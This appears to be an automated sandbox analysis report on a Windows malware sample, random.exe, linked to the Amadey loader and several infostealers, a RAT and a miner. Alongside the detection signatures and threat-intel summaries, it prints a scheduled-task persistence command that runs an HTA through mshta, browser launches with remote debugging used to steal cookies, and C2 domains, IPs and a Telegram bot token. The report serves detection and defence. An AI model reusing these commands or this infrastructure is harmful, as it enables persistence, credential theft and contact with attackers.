Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1609444
MD5:	7db5c669a674f639e4e086337a9752ac
SHA1:	4ead96cc70b32c52bed2983b5b69e6cc3c896ad8
SHA256:	048cab5a0b9b8950d2a3412698464a3dc322ea128e50cb7977cefd26eb12dfe7
Tags:	Amadeyexeuser-aachum
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer, RedLine, Vidar, XWorm, Xmrig

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Telegram RAT

Yara detected Vidar stealer

Yara detected XWorm

Yara detected Xmrig cryptocurrency miner

Yara detected obfuscated html page

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates HTA files

Creates HTML files with .exe extension (expired dropper behavior)

Creates multiple autostart registry keys

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 4460 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 7DB5C669A674F639E4E086337A9752AC)

skotes.exe (PID: 2064 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 7DB5C669A674F639E4E086337A9752AC)

skotes.exe (PID: 5256 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7DB5C669A674F639E4E086337A9752AC)

skotes.exe (PID: 5712 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 7DB5C669A674F639E4E086337A9752AC)

1VB7gm8.exe (PID: 2744 cmdline: "C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe" MD5: 0F2E0A4DAA819B94536F513D8BB3BFE2)

chrome.exe (PID: 6032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2956 --field-trial-handle=2864,i,16846066234531792387,18071606711430051804,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

WerFault.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8012 -ip 8012 MD5: C31336C1EFC2CCB44B4326EA793040F2)

msedge.exe (PID: 8044 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 5052 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2192,i,15452083786355478783,5027227299153518887,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

L65uNi1.exe (PID: 1444 cmdline: "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

L65uNi1.exe (PID: 2704 cmdline: "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

WerFault.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 952 MD5: C31336C1EFC2CCB44B4326EA793040F2)

af53YGc.exe (PID: 6648 cmdline: "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

af53YGc.exe (PID: 432 cmdline: "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

WerFault.exe (PID: 6640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 936 MD5: C31336C1EFC2CCB44B4326EA793040F2)

uniq.exe (PID: 8012 cmdline: "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe" MD5: E268F769ABD97E4E352D85E3308280FD)

uniq.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe" MD5: E268F769ABD97E4E352D85E3308280FD)

WerFault.exe (PID: 8088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 940 MD5: C31336C1EFC2CCB44B4326EA793040F2)

MvowLGc.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe" MD5: E3428319D1CC054423CE97B604795E0D)

RegAsm.exe (PID: 7496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

af53YGc.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

af53YGc.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

WerFault.exe (PID: 7972 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 892 MD5: C31336C1EFC2CCB44B4326EA793040F2)

L65uNi1.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

L65uNi1.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe" MD5: 56C1170157268E27017CFA8B5EBF500A)

WerFault.exe (PID: 7664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 956 MD5: C31336C1EFC2CCB44B4326EA793040F2)

b3d465ea47.exe (PID: 3212 cmdline: "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe" MD5: 6D70C38EF9261F30ACEAA554818C33EE)

cmd.exe (PID: 3852 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn MbBLmmautKb /tr "mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 3492 cmdline: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

msedge.exe (PID: 7652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 1944 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2060,i,4473131301431397879,15771113308977078991,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["actiothreaz.com", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "sX8RTW--googleanal"}

Threatname: Xworm

{"C2 url": ["127.0.0.1", "95.216.115.242"], "Port": 33333, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7567333742:AAHDfYPeN-w99Wqz2UqIryCqnJvB1iXUejw/sendMessage"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\af53YGc[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\L65uNi1[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\uniq[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000003.2530230419.0000000000BE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x209fc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2ae8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x45510:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20a99:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2af29:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x455ad:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x20bae:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2b03e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x456c2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2058e:$cnc4: POST / HTTP/1.1 0x2aa1e:$cnc4: POST / HTTP/1.1 0x450a2:$cnc4: POST / HTTP/1.1
0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x89f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8a91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ba6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8586:$cnc4: POST / HTTP/1.1
00000002.00000002.2243908073.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2253173379.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000003.2516223536.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2202506621.00000000006D1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.3430741230.0000000002643000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 1VB7gm8.exe PID: 2744	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 1VB7gm8.exe PID: 2744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: uniq.exe PID: 8036	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: MvowLGc.exe PID: 340	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegAsm.exe PID: 7496	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegAsm.exe PID: 7496	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: L65uNi1.exe PID: 7728	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: mshta.exe PID: 3492	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.2.MvowLGc.exe.3083298.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
26.2.MvowLGc.exe.3083298.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x52c7:$str01: $VB$Local_Port 0x52b8:$str02: $VB$Local_Host 0x5514:$str03: get_Jpeg 0x4fa3:$str04: get_ServicePack 0x6414:$str05: Select * from AntivirusProduct 0x6612:$str06: PCRestart 0x6626:$str07: shutdown.exe /f /r /t 0 0x66d8:$str08: StopReport 0x66ae:$str09: StopDDos 0x67a4:$str10: sendPlugin 0x6942:$str12: -ExecutionPolicy Bypass -File " 0x6a6b:$str13: Content-length: 5235
26.2.MvowLGc.exe.3083298.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6df4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6e91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6fa6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6986:$cnc4: POST / HTTP/1.1
26.2.MvowLGc.exe.3078e08.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
26.2.MvowLGc.exe.3078e08.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x52c7:$str01: $VB$Local_Port 0x52b8:$str02: $VB$Local_Host 0x5514:$str03: get_Jpeg 0x4fa3:$str04: get_ServicePack 0x6414:$str05: Select * from AntivirusProduct 0x6612:$str06: PCRestart 0x6626:$str07: shutdown.exe /f /r /t 0 0x66d8:$str08: StopReport 0x66ae:$str09: StopDDos 0x67a4:$str10: sendPlugin 0x6942:$str12: -ExecutionPolicy Bypass -File " 0x6a6b:$str13: Content-length: 5235
26.2.MvowLGc.exe.3078e08.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6df4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6e91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6fa6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6986:$cnc4: POST / HTTP/1.1
27.2.RegAsm.exe.380000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
27.2.RegAsm.exe.380000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x70c7:$str01: $VB$Local_Port 0x70b8:$str02: $VB$Local_Host 0x7314:$str03: get_Jpeg 0x6da3:$str04: get_ServicePack 0x8214:$str05: Select * from AntivirusProduct 0x8412:$str06: PCRestart 0x8426:$str07: shutdown.exe /f /r /t 0 0x84d8:$str08: StopReport 0x84ae:$str09: StopDDos 0x85a4:$str10: sendPlugin 0x8742:$str12: -ExecutionPolicy Bypass -File " 0x886b:$str13: Content-length: 5235
27.2.RegAsm.exe.380000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8bf4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8c91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8da6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8786:$cnc4: POST / HTTP/1.1
26.2.MvowLGc.exe.3083298.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
26.2.MvowLGc.exe.3083298.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x70c7:$str01: $VB$Local_Port 0x2174b:$str01: $VB$Local_Port 0x70b8:$str02: $VB$Local_Host 0x2173c:$str02: $VB$Local_Host 0x7314:$str03: get_Jpeg 0x21998:$str03: get_Jpeg 0x6da3:$str04: get_ServicePack 0x21427:$str04: get_ServicePack 0x8214:$str05: Select * from AntivirusProduct 0x22898:$str05: Select * from AntivirusProduct 0x8412:$str06: PCRestart 0x22a96:$str06: PCRestart 0x8426:$str07: shutdown.exe /f /r /t 0 0x22aaa:$str07: shutdown.exe /f /r /t 0 0x84d8:$str08: StopReport 0x22b5c:$str08: StopReport 0x84ae:$str09: StopDDos 0x22b32:$str09: StopDDos 0x85a4:$str10: sendPlugin 0x22c28:$str10: sendPlugin 0x8742:$str12: -ExecutionPolicy Bypass -File "
26.2.MvowLGc.exe.3083298.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8bf4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x23278:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8c91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x23315:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8da6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2342a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8786:$cnc4: POST / HTTP/1.1 0x22e0a:$cnc4: POST / HTTP/1.1
10.2.L65uNi1.exe.4109550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.L65uNi1.exe.4109550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.MvowLGc.exe.3078e08.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
